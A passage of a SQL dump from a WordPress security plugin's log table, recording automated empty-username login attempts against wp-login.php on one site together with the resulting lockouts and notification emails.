Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYzU3kXpgmG5P@iB8k91wAAAIo\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"54.37.21.211\";s:11:\"REMOTE_PORT\";s:5:\"40800\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYzU3kXpgmG5P@iB8k91wAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076051.1811\";s:12:\"REQUEST_TIME\";s:10:\"1569076051\";}}','notice','2019-09-21 14:27:32','2019-09-21 14:27:31',17853448,19343152,'https://bintara.com.my/blog/wp-login.php',1,0,'54.37.21.211'),(26268,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:27:31\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:27:31\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:27:31\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:27:31\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:27:32','2019-09-21 14:27:31',17938240,19343152,'https://bintara.com.my/blog/wp-login.php',1,0,'54.37.21.211'),(26269,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:27:32','2019-09-21 14:27:31',18144664,19343152,'https://bintara.com.my/blog/wp-login.php',1,0,'54.37.21.211'),(26270,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYzWliJ7D9Gn7wDPh8miQAAAMI\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"166.111.80.223\";s:11:\"REMOTE_PORT\";s:5:\"42522\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYzWliJ7D9Gn7wDPh8miQAAAMI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076058.7158\";s:12:\"REQUEST_TIME\";s:10:\"1569076058\";}}','notice','2019-09-21 14:27:40','2019-09-21 14:27:39',17849320,19339104,'https://bintara.com.my/test/wp-login.php',1,0,'166.111.80.223'),(26271,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:27:39\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:27:39\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:27:39\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:27:39\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:27:40','2019-09-21 14:27:39',17933848,19339104,'https://bintara.com.my/test/wp-login.php',1,0,'166.111.80.223'),(26272,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:27:40','2019-09-21 14:27:39',18140056,19339104,'https://bintara.com.my/test/wp-login.php',1,0,'166.111.80.223'),(26273,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYzXViJ7D9Gn7wDPh8miwAAAMM\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"80.211.2.59\";s:11:\"REMOTE_PORT\";s:5:\"44430\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYzXViJ7D9Gn7wDPh8miwAAAMM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076061.6871\";s:12:\"REQUEST_TIME\";s:10:\"1569076061\";}}','notice','2019-09-21 14:27:43','2019-09-21 14:27:42',17851744,19341360,'https://bintara.com.my/wp/wp-login.php',1,0,'80.211.2.59'),(26274,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:27:42\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:27:42\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:27:42\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:27:42\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:27:43','2019-09-21 14:27:42',17936408,19341360,'https://bintara.com.my/wp/wp-login.php',1,0,'80.211.2.59'),(26275,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:27:43','2019-09-21 14:27:42',18142856,19341360,'https://bintara.com.my/wp/wp-login.php',1,0,'80.211.2.59'),(26276,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYzebfBTP0kPOVnb8jx7QAAAFQ\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"79.98.129.163\";s:11:\"REMOTE_PORT\";s:5:\"39468\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYzebfBTP0kPOVnb8jx7QAAAFQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076089.7916\";s:12:\"REQUEST_TIME\";s:10:\"1569076089\";}}','notice','2019-09-21 14:28:11','2019-09-21 14:28:10',18084824,19573712,'https://bintara.com.my/wordpress/wp-login.php',1,0,'79.98.129.163'),(26277,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:28:10\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:28:10\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:28:10\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:28:10\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:28:11','2019-09-21 14:28:10',18169600,19573712,'https://bintara.com.my/wordpress/wp-login.php',1,0,'79.98.129.163'),(26278,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:28:11','2019-09-21 14:28:10',18376056,19573712,'https://bintara.com.my/wordpress/wp-login.php',1,0,'79.98.129.163'),(26279,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYziHkXpgmG5P@iB8k9-wAAAJA\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"165.227.15.124\";s:11:\"REMOTE_PORT\";s:5:\"51173\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYziHkXpgmG5P@iB8k9-wAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076104.7952\";s:12:\"REQUEST_TIME\";s:10:\"1569076104\";}}','notice','2019-09-21 14:28:26','2019-09-21 14:28:25',18108232,19592616,'https://bintara.com.my/2019/wp-login.php',1,0,'165.227.15.124'),(26280,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:28:25\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:28:25\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:28:25\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:28:25\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:28:26','2019-09-21 14:28:25',18192688,19592616,'https://bintara.com.my/2019/wp-login.php',1,0,'165.227.15.124'),(26281,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:28:26','2019-09-21 14:28:25',18399160,19592616,'https://bintara.com.my/2019/wp-login.php',1,0,'165.227.15.124'),(26282,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYzuLfBTP0kPOVnb8jx8QAAAEU\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"167.114.118.135\";s:11:\"REMOTE_PORT\";s:5:\"33122\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYzuLfBTP0kPOVnb8jx8QAAAEU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076152.5808\";s:12:\"REQUEST_TIME\";s:10:\"1569076152\";}}','notice','2019-09-21 14:29:13','2019-09-21 14:29:13',18159544,19643648,'https://bintara.com.my/wp/wp-login.php',1,0,'167.114.118.135'),(26283,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:29:13\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:29:13\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:29:13\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:29:13\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:29:13','2019-09-21 14:29:13',18243704,19643648,'https://bintara.com.my/wp/wp-login.php',1,0,'167.114.118.135'),(26284,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:29:13','2019-09-21 14:29:13',18450536,19643648,'https://bintara.com.my/wp/wp-login.php',1,0,'167.114.118.135'),(26285,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 